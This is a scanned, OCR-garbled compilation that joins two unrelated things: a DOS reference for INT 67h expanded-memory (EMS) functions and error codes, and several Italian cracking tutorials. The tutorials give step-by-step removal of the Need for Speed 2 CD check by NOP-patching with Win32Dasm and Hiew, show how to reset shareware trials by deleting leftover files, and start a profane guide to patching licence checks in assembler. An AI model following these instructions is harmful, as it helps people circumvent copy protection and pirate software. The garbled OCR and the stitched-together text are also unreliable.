AH = 
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status 


00 success 

80 internal software error 

81 hardware malfunction 

83 unallocated or invalid handle 

84 undefined function requested 

85 no handles available 

86 error in save or restore of mapping context 

87 more pages requested than physically exist 

88. more pages requested than currently available 

89 zero pages requested 

8A invalid logical page number 

8B illegal physical page number 

8C context stack out of memory 

8D context save failed, handle already has context stack 

8E context restore failed, no context stack for handle 

8F invalid subfunction 

90 undefined attribute type 

91 feature not supported 

92 success, portion of the source region was overwritten 

93 length of source or destination region exceeds length of 
region allocated to either source or destination handle 

94 conventional and expanded memory regions overlap 

95 offset within logical page exceeds size of logical page 

96 region length exceeds 1M 

97 source and destination regions have same handle and overlap 

98 memory source or destination type undefined 


9A specified DMA register set not supported ??? 
specified alternate map register set not supported 
9B all DMA register sets currently allocated ??? 
all alternate map register sets currently allocated 
9C alternate DMA sets not supported ??? 
alternate map register sets not supported 
9D undefined or unallocated DMA register set ??? 
undefined or unallocated alternate map register set 
9E dedicated DMA channels not supported 
9F specified dedicated DMA channel not supported 
A1 duplicate handle name 
A2  attempted to wrap around 1Mb conventional address space 
A3 contents of partial page map corrupted or count of 
mappable segments exceeds total mappable segments 
A4 operating system denied access 


- registers not listed are preserved 
- should only be used after establishing that the EMS driver 


:int 67,41 


is 


present 


NINT 67,41 - Get Page Frame Base Address (LIM EMS 3.0+) 


= 41h 

return: 

= 00 success 

= error code (see -EMS STATUS-) 
= segment of page frame (PFBA) 


- use this to determine where in the 1Mb memory address the page 
frame will be mapped 
- registers not listed are preserved 


‘int 67, 


42 


NINT 67,42 - Get Page Counts (LIM EMS 3.2+) 


= 42h 

return: 

= 00 success 

= error code (see -EMS STATUS-) 

= number of unallocated or available pages 
= total number of pages in EMM system 


- registers not listed are preserved 


:int 67, 


43 


NAINT 67,43 - Get Handle and Allocate Pages (LIM EMS 3.2+) 


AH = 43h 

BX = number of logical pages to allocate 
on return: 

AH = 00 success 
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error code (see -EMS STATUS-) 
EMM handle 


DX 


- handles not explicitly closed by the application are not 
recoverable on exit from the program 
- registers not listed are preserved 


:int 67,44 
NINT 67,44 - Map Logical Page Into Physical Page Window (LIM EMS) 


AH = 44h 

AL = physical page number (0-3) 

BX = logical page number (0 to total allocated minus 1) 
DX = EMM handle 

on return: 

AH 00 success 


error code (see -EMS STATUS-) 


- registers not listed are preserved 


:int 67,45 
NAINT 67,45 - Release Handle and Memory Pages (LIM EMS) 


AH = 45h 

DX = EMM handle 
on return: 

AH 00 success 


error code (see -EMS STATUS-) 


- handles must be explicitly freed by an application or the memory 
will not be available to the following applications 

- if unsuccessful, the operation should be retried 

- registers not listed are preserved 


:int 67,46 
NINT 67,46 - Get EMM Version (LIM EMS) 


AH = 46h 
on return: 
AH 00 success 


error code (see -EMS STATUS-) 
EMM version number in BCD 


- upper four bits of AL contain the BCD major version 
- lower four bits of AL contain the BCD minor version 
- registers not listed are preserved 


:int 67,47 
NAINT 67,47 - Save Page Map Context (LIM EMS 3.0+) 
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AH = 47h 

DX = EMM handle assigned to the interrupt service routine 
servicing the interrupt 

on return: 

AH 00 success 


error code (see -EMS STATUS-) 


- any TSR, ISR or device driver using EMS should save contexts 
before manipulating EMS memory and restore contexts afterwards 

- registers not listed are preserved 

- see -INT 67,48- 


‘int 67,48 
NAINT 67,48 - Restore Page Map Context (LIM EMS 3.0+) 


AH = 48h 

DX = EMM handle assigned to the interrupt service routine 
servicing the interrupt 

on return: 


AH = 00 success 
= error code (see -EMS STATUS-) 


- any TSR, ISR or device driver using EMS should save contexts 
before manipulating EMS memory and restore contexts afterwards 
- registers not listed are preserved 


:int 67,49 
NAINT 67,49 - Get I/0 Port Addresses (LIM EMS 6 3.0) 


AH = 49h 
ES:DI = far pointer to storage array 


on return: 
AL = board count (0 < AL <= 4) 
AH = 00 success 


error code (see -EMS STATUS-) 


- defined in EMS 3.0, but undocumented in EMS 3.2; new software 
should not use this function, but old software still works 
- registers not listed are preserved 


:int 67,4a 
AINT 67,4A - Get Logical to Physical Page Mapping (LIM EMS 6 3.0) 


AH = 4A 
DX = EMS handle 
ES:DI far pointer to storage array 


on return: 
AH = 00 success 
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error code (see -EMS STATUS-) 
contains count of entries placed in array at ES:DI 


BX 


- defined in EMS 3.0, but undocumented in EMS 3.2; new software 
should not use this function, but old software still works 
- registers not listed are preserved 


:int 67,4b 
AINT 67,4B - Get Handle Count (LIM EMS) 


AH = 4Bh 
on return: 
AH 00 success 


error code (see -EMS STATUS-) 
number of currently active EMM handles (0-256) 
zero indicates EMS not in use 


- to determine the number of handles available subtract BX from 255 
- registers not listed are preserved 


sint 67,4c 
NAINT 67,4C - Get Page Count for Handle (LIM EMS) 


AH = 4Ch 
DX = EMM handle 
on return 
AH = 00 success 
= error code (see -EMS STATUS-) 
BX = total allocated page count for handle (1-512) 


- a handle can refer to up to 512 logical pages 
- registers not listed are preserved 


:int 67,4d 
AINT 67,4D - Get Page Count for All Handles (LIM EMS) 


AH = 4Dh 
ES:DI = pointer to handle array 


on return: 
00 success 
error code (see -EMS STATUS-) 


BX number of active EMM handles (0..255) 
ES:DI = pointer to an array of entries of the format: 
Offset Size Description 
00 word EMS handle number 
02 word number of pages 


- buffer at ES:DI should be able to hold an array of at least 4*BX 
- an error will occur if ES:DI points to a buffer that will 

cause a segment swap 
- registers not listed are preserved 
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sint 67, 


4e 


AINT 67,4E - Get/Set Page Map Context (LIM EMS 3.2+) 


AH 
AL 


on 
AH 


AL 
ES 


4Eh 
00 get page mapping context into array 
ES:DI = pointer to destination array 
01 set page mapping context from array 
DS:SI = pointer to context source array 
02 get and set page mapping registers at once 
ES:DI = pointer to destination array 
DS:SI = pointer to context source array 
03 get size of page mapping array 
04-31 reserved 


return: 


00 success 
error code (see -EMS STATUS-) 
bytes in pagemapping array (when AL=3) 


:DI = pointer to array with mapping info (AL=00/02) 


- an error will occur if ES:DI points to a buffer that will 
cause a segment swap 
- designed for use by multitasking operating systems only 


sint 67,4f 
NAINT 67,4F - Get/Set Partial Page Map (LIM EMS 4.0+) 
AH = 4Fh 
AL = 00 get partial page map 
DS:SI = pointer to structure containing list of segments whose 
mapping contexts are to be saved 
ES:DI = pointer to array to receive page map 
AL = 01 set partial page map 
DS:SI = pointer to structure containing saved partial page map 
AL = 02 get size of partial page map 
BX = number of mappable segments in the partial map to be saved 
on return: 
AH = 00 success 
= error code (see -EMS STATUS-) 
AL = size of partial page map (if AL=2) 
:int 67,50 
AINT 67,50 - Map/Unmap Multiple Handle Pages (LIM EMS 4.0+) 
AH = 50h 
AL = 00 Map/unmap pages 
= 01 map/unmap segments 
DX = EMM handle 
CX = number of entries in array 
DS:SI = pointer to mapping array 
on return: 
AH 00 success 
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error code (see -EMS STATUS-) 


:int 67,51 
NAINT 67,51 - Reallocate Pages (LIM EMS 4.0+) 


AH = 51h 

DX = EMM handle 

BX = number of pages to be allocated to handle 

on return: 

AH = 00 success 

= error code (see -EMS STATUS-) 

BX = actual number of pages allocated to handle 

:int 67,52 


AINT 67,52 - Get/Set Handle Attributes (LIM EMS 4.0+) 


AH = 52h 
AL = 00 get handle attributes 

01 set handle attributes 

02 get attribute capability 
BL = new attribute (if AL=1) 
DX = EMM handle 
on return: 
AH = 00 success 

= error code (see -EMS STATUS-) 

AL = attribute (input AL=0) 


00 handle is volatile 
01 handle is nonvolatile 
AL = attribute capability (input AL=2) 
00 only volatile handles supported 
01 both volatile and nonvolatile supported 


:int 67,53 

NINT 67,53 Get/Set Handle Name (LIM EMS 4.0+) 
AH = 53h 
AL = 00 get handle name 


ES:DI = pointer to 8byte handle name array 


01 set handle name 
DS:SI = pointer to 8byte handle name 
DX = EMM handle 


on return: 
AH = status (see -EMS STATUS-) 
:int 67,54 
NINT 67,54 - Get Handle Directory (LIM EMS 4.0+) 


AH 
AL 


54h 
00 get handle directory 
ES:DI = pointer to buffer for handle directory 


01 search for named handle 
DS:SI = pointer to 8byte name 
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02 get total number of handles 


on return: 
AL = number of entries in handle directory (AL = 00h) 
DX = value of named handle (if AH was 01) 
BX = total number of handles (if AH was 02) 
AH = status (see -EMS STATUS-) 
:int 67,55 


NINT 67,55 - Alter Page Map and Jump (LIM EMS 4.0+) 


AH 
AL 


55h 

00 physical page numbers provided by caller 

01 segment addresses provided by caller 

DX = EMM handle 

DS:SI = pointer to structure with map and jump address 


on return: 
AH = status (see -EMS STATUS-) 


:int 67,56 
NINT 67,56 - Alter Page Map and Call (LIM EMS 4.0+) 


AH = 56h 
AL = 00 physical page numbers provided by caller 
DX = EMM handle 
DS:SI = pointer to structure with page map and call address 
01 segment addresses provided by caller 
DX = EMM handle 
DS:SI = pointer to structure with page map and call address 
02 get page map stack space required 
on return: 
BX = stack space required (AL = 02) 
AH = status (see -EMS STATUS-) 


- if successful, the target address is called 
- use a RETF to return and restore mapping context 


:int 67,57 
AINT 67,57 - Move/Exchange Memory Region (LIM EMS 4.0+) 


AH 
AL 


57h 

00 move memory region 

01 exchange memory region 

DS:SI = pointer to structure describing source and destination 


on return: 
AH = status (see -EMS STATUS-) 


:int 67,58 
AINT 67,58 - Get Mappable Physical Address Array (LIM EMS 4.0+) 
AH = 58h 
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AL = 00 get mappable physical address array 
ES:DI = pointer to buffer to be filled with array 
01 get number of entries in m.p.a. array 


on return: 

CX = number of entries in array 

AH = status (see -EMS STATUS-) 
:int 67,59 


NAINT 67,59 - Get Expanded Memory Hardware Information (LIM EMS 4.0+) 


AH = 59h 
AL = 00 get hardware configuration array 
ES:DI = pointer to buffer to be filled with array 
01 get unallocated raw page count 
on return: 
BX = unallocated raw pages (AL = 01) 
DX = total raw pages (AL = 01) 
AH = status (see -EMS STATUS-) 


- subfunction 00 is for use by operating systems only; can be 
enabled or disabled at any time by the operating system 


:int 67,5a 
NINT 67,5A - Allocate Standard/Raw Pages (LIM EMS 4.0+) 


AH 
AL 


5A 

00 allocate standard pages 
01 allocate raw pages 

BX = number of pages to allocate 


on return: 
DX = EMM handle 
AH = status (see -EMS STATUS-) 
sint 67,5b 
AINT 67,5B - Alternate Map Register Set (LIM EMS 4.0+) 
AH = 5B 
AL = 00 get alternate map register set 


01 set alternate map register set 
BL = new alternate map register set number 
ES:DI = pointer to map register context save area if BL=0 
02 get alternate map save array size 
03 allocate alternate map register set 
04 deallocate alternate map register set 
BL = number of alternate map register set 
05 allocate DMA register set 
06 enable DMA on alternate map register set 
BL = DMA register set number 
DL = DMA channel number 
07 disable DMA on alternate map register set 
BL = DMA register set number 
08 deallocate DMA register set 
BL = DMA register set number 
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on return: 


AH = status (see -EMS STATUS-) 

BL = active alternate map register set number if nonzero (AL=0) 
= number of alternate map register set; 0 if not supported (AL=3) 
= DMA register set number; zero if not supported (AL = 05) 

DX = array size in bytes (AL = 02) 


ES:DI = pointer to a map register context save area if BL=0 (AL=0) 
- for use by operating systems only; can be enabled or disabled 
at any time by the operating system 


sint 67,5c 
NINT 67,5C - Prepare Expanded Memory for Warm Boot (LIM EMS 4.0+) 


AH = 5C 

on return: 

AH = status (see -EMS STATUS-) 
:int 67,5d 


AINT 67,5D - Enable/Disable 0S Functions (LIM EMS 4.0+) 


AH 
AL 


5D 

00 enable OS function Set 

01 disable 0S function Set 

02 return access key 

BX, CX = access key returned by first invocation 


on return: 
AH = status (see -EMS STATUS-) 
BX,CX = access key, returned only on first invocation of function 


- function 2 resets memory manager, returns access key at next 
invocation 


int 67,60 
AINT 67,60 - LIM EMS Get Physical Window Array 


AH = 60h 
ES:DI = pointer to physical window array 


on return: 
AH = 00 success 
= error status (see -EMS STATUS-) 


sint 70 
AINT 70 - Real Time Clock Interrupt (XT 286,AT,PS/2) 


- called 1024 times per second for periodic and alarm functions 

- decrements a DWORD counter by 976x sec (1/1024) 

- when DWORD reaches zero, bit 7 of designated wait flag is set 

- if alarm was enabled by -INT 1A,6-, -INT 4A- is called when 
counter reaches zero to activate alarm handler 

- not available in model 30 PS/2 
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- see -INT 15,83- -INT 15,86- 
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CRACK ( CD ) DI UN GIOCO 
COSA SERVE PER CRACKARE 


Ok prima di cominciare a crackare hai bisogno di un disassemblatore! Io uso Win32Dasm e penso 
che sia il miglior programma per un apprendista crackatore. 


Poi hai bisogno di Hiew per manipolare gli exe che vuoi crackare perché con Win32Dasm puoi solo 
guardare negli exe ma non puoi cambiare niente. 


Win32Dasm 
Hiew 
Devi diventare pratico di questi due programmi per riuscire a crackare i programmi. 


Ok, prendiamo per buono che hai i programmi e cominciamo a crackare. 


SI COMINCIA!!! 

Crackare con Win32Dasm 

Ok in questa lezione ti mostrerò come lavorare con Win32Dasm e Hiew. 

Oggi vogliamo crackare un gioco molto facile da crackare. Crackeremo Need for Speed 2. 


Ok. Lanciamo Win32Dasm.exe.Possiamo vedere la schermata principale e la toolbar. Clicchiamo 
su 


Disassembler. Un menù appare e possiamo vedere delle opzioni. Clicchiamo su Open file to 
Disassemble. Un altro menù ci mostr il nostro HD e possiamo selezionare l’exe da crackare(ecco 
nfsw.exe).Il processo di disassemblazione può prendere alcuni minuti(cerca di avere almeno 80Mb 
liberi su disco o l’exe potrebbe non essere disassemblato totalmente). Ok, l’exe è disassemblato. E 
ora? 


Tutto quello che vedi è un testo scritto col font Windings?NESSUN PROBLEMA!!! 


Clicca su Disassembler e sulla schermata di opzioni seleziona Font e poi Select Font. Ora puoi 
selezionare il font da visualizzarepenso che il miglior font per lavorare sia Arial). Clicca Ok. 


Ora possiamo leggere iltesto.Ok.Ma cosa diavolo vuol dire? 

Object01: Begtext RVA: 00001000 Offset: 00000400 Size: 0O00AEA00 Flags 60000020 

Cosa significa?Non lo sappiamo.Ma non importa!Non abbiamo bisogno di saperlo.Quello di cui 
abbiamo bisogno è di lanciare il gioco(Need for Speed 2) senza il CD inserito. Non funziona 


huh?PORK!Ma che messaggio di errore da? 


Messaggio di errore: 


To play Need for Speed 2 you need the Cd 


Ok.Ora sappiamo il messaggio di errore!Questo è molto utile!Torniamo al Win32Dasm (nfsw.exe è 
già disassemblato), clicchiamo di destro sulla toolbar sul pulsante String Data References (è il 
pulsante dopo quello di stampa).Si apre una finestra chiamata Win32Dasm List of String Data 
Items. Ok. Tutto quello che dobbiamo fare è cercare il messaggio di errore che abbiamo visto 
lanciando Need for Speed senza il CD (per giocare a Need for Speed è necessario il CD). Cominicia 
per T per ,,To Play“ quindi non cerchiamo dall’inizio ma saltaiamo alla sezione dove vediamo 
messaggi che cominciano per ,,T. Ed è lì che troviamo il messaggio di errore ,,To play Need for 
Speed 2 you“. Doppio click sul messaggio. Chiudiamo il menu pop-up con il messaggio di errore e 
torniamo alla schermata principale di Win32Dasm con il testo di nfsw.exe. Possiamo vedere che 
non siamo più all’inizio del testo ma in un qualche punto nel mezzo. Siamo ora esattamente nel 
posto dev’è il messaggio di errore. Vediamo ancora parole varie e non sappiamo cosa significa. Ma 
l’unica cosa che ci interessa di sapere e il numero di @offset di ogni comando di chiamata(call) o di 
salto(jump) (jump=jmp call = call). Guardiamo un attimo allo schermo e vediamo un comando di 
jump: 


:0044632C EB1BC5E3E1 call 00446349 


Usiamo i tasti cursore per cliccare sul comando jump. La Opbar cambia il suo colore in verde. 
Questo significa che possiamo manipolare il testo(possiamo modificare ogni cosa nell’exe, ma la 
barra verde ci segnala comandi importanti come jump,call...). Lasciamo la barra sul comando jump 
e guardiamo sotto la barra, dove vediamo alcuni numeri: 


Line:120246 Pg 1604 of 4273 Code Data @:0045821 @Offset 00045821h in file:nfsw.exe 


La sola cosa che ci interessa è il numero dopo @Offset (qui è 00045821), non abbiamo bisogno 
dell’ultima h. 


Ci segnamo il numero(00045821) e chiudiamo Win32Dasm. 


Ora andiamo con Hiew. 


Crackare con HIEW 


Lanciamo Hiew.exe(h.exe/h95.exe).Possiamo vedere la lista dei programmi e degli exe nella 
directory di HIEW in modo simile al Norton Commander. Usiamo i tasti cursore mer muoverci e 
andiamo nella directory doveabbiamo salvato l’exe che vogliamo crackare(per es. in 
c:\giochi\nfs2\nfsw.exe). Clicchiamo sull’exe che vogliamo cragckare(nfsw.exe).Vediamo codice 
su codice e non sappiamo cosa fare. Premiamo F4 e appare un menù. Nel menù selezioniamo 
Decode. Ora possiamo vedere una lista di numeri e altre cose. Ora premiamo FS e nel lato sinistro 
dello schermo possiamo inserire il numero che ci abbiamo segnato in Win32Dasm (00045821). 
Scriviamo il numero e veniamo spostati da Hiew nel punto dove il numero esiste. Ora vediamo 
molti numeri e il cursore è posizionato su EB1BC5E3E 1 (in Need for Speed 2).Ok. Ogni due 
numeri abbiamo un byte. Qui abbiamo EB1BC5E3E]1, quindi abbiamo 5 byte. Ora premiamo 
F3(modifica). Ora possiamo modifica re i 10 numeri EB1BC5E3E1. Scriviamo 9. Se scriviamo 
veniamo spostati in altri punti, ma non è un problema. Il 9 è ancora lì. Ora scriviamo 0 e poi ancora 


9 e 0. Lo faremo per ognuna delle coppie, quindi 5 volte. Premiamo F9(aggiorna).Abbiamo scritto 5 
volte 90. Per ogni byte 90. Per EB=90 1B=90 C5=90 E3=90 E1=90.PER OGNI BYTE 90. 


Per esempio: se ci posizioniamo su E8D117FDFF (è il codice di @offset per i filmati, ma per ora 
non preoccupiamocene), significa 10 numeir = 5 byte e per ogni byte un 90!!!! Il numero 90 è il 
numero noop(no operation, nessuna operazione).Ok.Premiamo F10(Chiudi) Ora possiamo lanciare 
Need for Speed 2 senza CD!!! 


Abbiamo rimosso la protezione CD per Need for Speed 2!!!! 


OK L’ABBIAMO FATTO 


Ok abbiamo crackato la protezione CD. 


QUALCOSA DA RICORDARE 
La prima cosa da fare per crackare un gioco è lanciarlo senza CD! 


Poi guardare che messaggio di errore da. Devi ricordarti l’ultimo messaggio di errore e lanciare 
Win32Dasm e guardare sotto List of String Data dove troverai il messaggio di errore. Per esempio: 
lanci il gioco senza i filmati sul tuo HD. Il gioco ti darà un messaggio di errore tipo , MOVIE FILE 
not found“. Ora potrai cercare in Win32Dasm dove trovi il messaggio di errore ,,MOVIE FILE not 
found“. Se lo trovi fai doppio click su questo. Chiudi la List of Data String Items e torna su 
Win32Dasm, che si sarà spostato nel punto in cui si trova il messaggio di errore. Segnati ogni 
numero di @offset di jump e call (riconoscerai i comandi dalla barra che diventerà verde. Hai 
bisogno solo dei numeri senza la h!!!!Poi ti sposti in Hiew e scrivi il numero per ricercarlo. Poi 
modifica i comandi di call o jump con l’uso di 90 per ogni byte (ricorda che due numeri sono un 
byte). Poi selezioni aggiorna e chiudi. Ora hai noopato il gioco!!! 


F.A.Q. 
Domanda:Cosa faccio se ci sono più di una call o jump oppure una all e un jump? 


Risposta:Ok.Ora sei nel punto in cui comincia il vero crackare! One delle call o jump è ,,Bravo 
Ragazzo“ e l’altra è ,,Cattivo Ragazzo“!!! Un bravo ragazzo è buono e se trasformi in noop il bravo 
ragazzo il gioco non funzionerà nel 99% dei casi. Ma qual è il buono e quale il cattivo?Non lo 
sappiamo!Devi provare!La miglior cosa da fare è salvare l’exe e andare avanti col vecchio duro 
metodo ,a tentativi‘. Provi il noop su un comando e controlli se il gioco funziona. Se funziona, 
bene, altrimenti ricarichi il vecchio exe e provi un altro numeri. All’inizio puoi provare a noopare 
ogni call e jump che vedi ma sono sicuro che il gioco poi non funzionerà. Devi provare differenti 
combinazioni di noop finchè non funziona!!! 


D:Non c’è il pulsante String Reference disponibile! 

R:In tal caso la possibilità di crackare il gioco scende al 5%. 

L’unica cosa che puoi provare è cercare a mano le parole chiave cd/movie/music/error... 

O guardare nell’ HexWorkShop se trovi una stringa che puoi manipolare. Ma hai poche possibilità. 
D:Le ho provate tutte ma non riesco a crackare il gioco! 

R:Ci sono due possibili strade: 

1.:Hai fatto qualcosa di sbagliato(come noopare un Bravo Ragazzo, noopare qualcosa che il gioco 
richiede, non avete noopato abbastanza e non avete noopato le protezione richiesta o avete noopato 


troppe cose e il gioco non va) 


2.:Non puoi crackare il gioco perché è un’operazione troppo difficile o nessuno può crackare il 
gioco(più probabilmente la prima cosa). 


VELOCI PROMEMORIA 


- Due numeri sono un byte :E4c2A1 significa E4=1byte C2=1byte A1=1byte e per ogni byte un 90 
(il numero noop) 


- Inizia senza CD e poi cerca il messagigo di errore presentato 

- Con il messaggio lancia Win32Dasm e vai nel menu String of Data Items 
- Cerca lo stesso messaggio di errore, facci un doppio click 

- Segna il numero dopo @offset senza h per ogni call e jump 


- Con il numero di @offset vai in Hiew e fai il noop all‘indirizzo 


COME FREGARE I PROGRAMMI SHAREWARE 


Gli Shareware hanno lo scopo di dare la possibilita ad un utente di provare un determinato 
programma per un lasso di tempo determinato. Passato il periodo valutativo le possibilità che 
abbiamo sono due: 


a) Aquistare il software 
b) Disinstallare il programma (anche perché probabilmente è divenuto inutilizzabile) 


Chiaramente se decidiamo di acquistare il Software la casa produttrice provvederà a inviarci o un 
codice per poter registrare il prodotto, o un nuovo programma, e quindi non abbiamo bisogno di 
ricorrere a qualche piccola astuzzia per continuare ad usare il nostro bel programma shareware. 
Se, come succede sempre, non abbiamo nessuna intenzione di spendere soldi per qualcosa che ci 
piace ma che per noi non è indispensabile, allora dobbiamo cominciare a chiederci alcune cose, e 
soprattutto dobbiamo cercare di pensare come un programmatore che vuole creare una versione 
valutativa del suo programma. 

Ci sono molti modi per proteggere in modo più o meno efficace un programma, vediamone alcuni 
insieme: 


a) Creazione di un programma dimostrativo con alcune funzioni disattivate e con una data fissa di 
scadenza 

b) Creazione di un programma dimostrativo con data di scadenza fissa, controllata al momento 
dell'installazione 

c) Creazione di un programma perfettamente funzionante con giorni di utilizzo contati a partire dal 
giorno dell'installazione 


Il Caso a) è il più complesso e difficile da risolvere in quanto è necessario utilizzare appositi 
programmi (debugger) che ci permettano di entrare in profondità nel programma e di andare a 
modificare qualle parti di codice che ad esempio contengono la data di scadenza, e successivamente 
controllare se i le funzioni non utilizzabili sono disabilitate o se non sono state inserite nel 
programma valutativo. 

Anche il Caso b) richiede l'utilizzo di un debugger in quanto ha una data di scadenza fissa (ad es. il 
30 gennaio 1998), per poter almeno vedere il programma, nel caso in cui ne siamo venuti in 
possesso dopo la sua data di scadenza, e sufficiente spostare il nostro orologio del computer 
indietro, prima della scadenza del programma. 

Il Caso c), quello più frequente, è il più facile da risolvere... Facciamo qualche tentativo.... 

1) Installiamo il programma, terminata l'installazione annotiamo la data e l'ora in cui abbiamo 
svolto l'opereazione 

2) Avviamo il programma la prima volta, sempre annotando la data e l'ora 

3) Uscendo dal programma annotiamo data e ora 

4) Portimao avanti la data del nostro computer fino ad arrivare oltre la scadenza, avviamo il 
programma e usciamo dopo pochi secondi, annotando sempre la data e l'ora in cui effettuiamo le 
varie operazioni. Stampiamoci una lista di tutti i file contenuti nella cartella C:\Windows e nella 
cartella \Windows\System. 

5) Disinstalliamo il programma con "installa/disinstalla applicazioni" e RI-Stampiamoci una lista di 
tutti i file contenuti nella cartella C:\Windows e nella cartella \Windows\System. 

6) Confrontiamo le due liste ed eliminiamo i file che compaiono in entrambe, il file o i file rimaneti, 
probabilmente, contengono informazioni che il programma va a leggere al momento dell'avvio e 
grazie alle quali determina il tempo rimanente ed altre notizie. Nel caso in cui vengano trovati più 
file controllate la data del loro ultimo aggiornamento e cancellate solo quelli con la data uguale a 
quelle annotate nei pinti 1, 2,3 e 4 


7)Adesso possiamo re-installare il nostro programma ed utilizzarlo fino alla nuova scadenza. 
N.B.: In alcuni casi e sufficiente cancellare il file trovato al punto 6) per azzerare la scadenza e 
poter così utilizzare il programma. 


Dalla teoria alla pratica 


Per adesso abbiamo fatto solo supposizioni e scritto tante parole, per capire meglio cosa dobbiamo 
fare proviamo a mettere in pratica tutto quello che è stato scritto fino ad ora.. e speriamo bene ;-) ! 
Prendiamo come esempio un programma molto semplice e che tutti conoscono Animagic 
applichiamo passo di passo tutto ciò che abbiamo letto e ci accorgeremo di un file molto strano, 
dalle dimensioni insignificanti, aninst00.whe, l' unico file che rimane di animagic dopo la sua 
disistallazione, se provassimo a installare il programma senza averlo cancellato si accorgerebbe che 
stiamo cercando di utilizzarlo una seconda volta dopo la sua scadenza. Una volta cancellato 
aninst00.whe possiamo procedere tranquillamente ad una nuova installazione. Spero di essere stato 
abbastanza chiaro, un'ultima cosa importante...Ogni volta che vengono installati dei programmi per 
windows95, oltre ai file programma vengono aggiornati anche i registri di windows, quidi quando 
arriva il momento di scegliere il giusto file da candellare fate attenzione a non cancellere dei rigistri 
di sistema. 


CRACKING TUTORIAL 


1. Prefazione 

Per iniziare vorrei subito dire che tutto quello che segue non e' 
assolutamente da prendere sul serio e non e' assolutamente da fare o provare. 
Anzi, e' assolutamente illegale, e quindi, se non volete dire "ciao" a un 
pulotto che suona al vostro campanello perché siete diventati pirati 
informatici non fatelo. 


Bene bene bene... Detto questo un ciao a tutti voi che avete una gran voglia 
di fottere tutti quei programmini Shareware del cazzo che dopo trenta giorni 
di evaluation non funzionano piu', o quelli che danno possibilita' limitate a 
meno che non inseriate la mistica password associata all'user name inserito 
ecc... vi siete proprio rotti le balle... vero? Io almeno, confesso che me le 
sono rotte, e quindi... aguzzo l'ingegno e inculo tutte quelle softwarehouse 
che ti chiedono 20$ per il loro programma. Ma se vi devo dire la verita' non 
lo faccio solo per questo, ma anche per un altro motivo: Quando riesco a 
mettere insieme tutti i pezzi del puzzle, e vedo sullo schermo del mio bel pc 
una finestrella che mi dice "Tnx for registering" mi sento un grande. Perche' 
penso di essere uno dei pochi su questa faccia della terra a essere in grado 
di farlo, e quindi mi sento un figo. Comunque, quando poi ripenso ai 20$ 
risparmiati sono ancora piu' felice... Quindi questo manuale non e' da vedere 
come un manuale al crackaggio, ma piu' come un manuale della felicita'... che 
umorista che sono... io non devo passare tutte queste ore davanti al pc... 

poi mi metto a scrivere stronzate del genere... sono proprio fuso... vabbe'... 
mi accendo una cicca, va'. 


In ogni caso questo non e' un manuale di Assembler, quindi non aspettatevi 
particolari sull'asm, quelli li trovate in inglese in giro per Internet, ma 

e' una guida al crackaggio. Quello che voglio insegnare non e' come trovare le 
password associate agli user name, ma semplicemente come avere l'accesso. Per 
riuscire a scoprire la password, avete bisogno di conoscere un sacco di asm e 
soprattutto dovete farvi un pacco cosi' di matematica... ma questo e' un altro 
file... forse in futuro ve lo scrivero'... Adesso andiamo al sodo e cominciamo: 


2. Breve introduzione all'Assembler 

Allora. Per crackare un programma bisogna disassemblarlo, cioe' tradurre il 
programma .exe o .com in una lista di istruzioni da noi comprensibili, per 
poi modificarlo in modo da fargli credere di aver inserito la password 
giusta, o che i 30 giorni non sono passati e cosi' via. Siccome per 
disassemblare i programmi da crackare si usa il SoftIce, che disassembla i 
programmi in Assembler (asm), bisogna sapere questo linguaggio. Voi direte, 
"ma non possiamo tradurre il programma in italiano, cosi' lo capiscono 
tutti?". E io vi rispondo, ci sto lavorando, ma quando avro' finito lo 
distribuiro' in una versione Shareware incrackabile! Tje'! 

Ok. Ora vi spiego un po' come funziona l'Assembler: 


2.1 I registri 

La CPU del computer e' divisa in diversi registri, che ora vi spiego uno per 
uno cosa sono e come si chiamano, e servono per memorizzarci dei dati. I 
registri in tutto sono quattro, e si chiamano 


AX - Accumulatore 
BX - Base register 
CX - Contatore 

DX - Data register 


Ognuno di questi registri puo' essere suddiviso in una parte alta e una bassa. 

Per esempio AX si suddivide in AL (Low) e AH (High). Nella CPU del Pentium, 
che lavora a 32 bit, i registri si chiamano EAX, EBX e cosi' via. Mi spiego 
meglio con questo schemino: 


AL = 8 Bit (parte bassa del registro AX) 

AH=8Bit (parte alta del registro AX) 

AX = 16 Bit (formato da AL e AH messi insieme) 

EAX = 32 Bit (formato da AX e altri 16 Bit che pero' non sono direttamente 
accessibili dall'utente) 


Ovviamente questa suddivisione vale anche per BX, CX e DX. 
Poi ci sono i segment register: 


CS - Vuol dire Code segment. E' l'area di memoria nella quale si trova il 
programma che state modificando. L'indirizzo CS:IP e' l’istruzione che 


state per eseguire. 


DS - Il Data segment. La parte di memoria nella quale si trovano i dati. La 
CPU di solito vi accede solo in lettura. 


ES - Extra segment. In questa area di memoria la CPU vi accede in scrittura. 


IP - Instruction pointer. E' l'indirizzo dell'istruzione che state per 
eseguire. 


SS - Stack segment. Questa e' roba complicate... non vi serve per i vostri 
scopi crackistici. 


SI - Source Index. E' un puntatore. 
DI - Destination index. Un'altro puntatore. 
BP - Base pointer. Questo viene usato insieme allo SS. 


SP - Stack pointer. Serve a puntare una locazione all'interno dello Stack. E" 
usato insieme a SS. 


Questi sono i registri della CPU, le informazioni qui riportate, non sono 
complete, ma non starò' neanche qui' a completarle, perché' per i nostri loschi 
scopi non sono di importanza rilevante. Se proprio volete saperne di più' 
andate a leggervi una delle tante guide sull'Assembler che si trovano in giro 
per Internet. 


2.2 I flag 
Servono ad indicare se un jump condizionale (vedi sezione istruzioni) deve 
essere eseguito o no. Per esempio 


CMP AL, BL ........... Confronta il registro al con bl 
JLSFID picnic Salta se zero a 3F1D 


La prima istruzione esegue un confronto tra AL e BL. Se sono uguali il flag Z 
diventa 1 (attivo), nel caso contrario invece, 0 (disattivo). 

La seconda istruzione salta all'indirizzo specificato se il flag Z e' 0. 

Se per esempio in AL abbiamo il numero di giorni da quando stiamo usando il 
programma, e in BL, il numero di giorni che il programma deve funzionare, 
modificando il flag zero possiamo far credere al programma che i giorni ancora 
non sono finiti, e quindi possiamo continuare ad usare il programma. Capito? 


Mettiamo il caso: 


AES darbaala Stiamo usando il prog. da 3 giorni 
BL=1E aaa (1E = 30 in Hex) Per quanti giorni possiamo usare 
il prog 


Premesso questo, ora eseguiamo i comandi: 


CMP AL, BL ........... Confronta il 3 con il 30d 
IZOFID: Sadugian Se i due sono uguali (tutti e due 30, flag Z = 1) 
salta a 3F1D e ci dice di registrare il programma 


Tutto chiaro? Penso di si... queste sono cazzate da capire in fondo, credo. 


2.3 Le istruzioni 
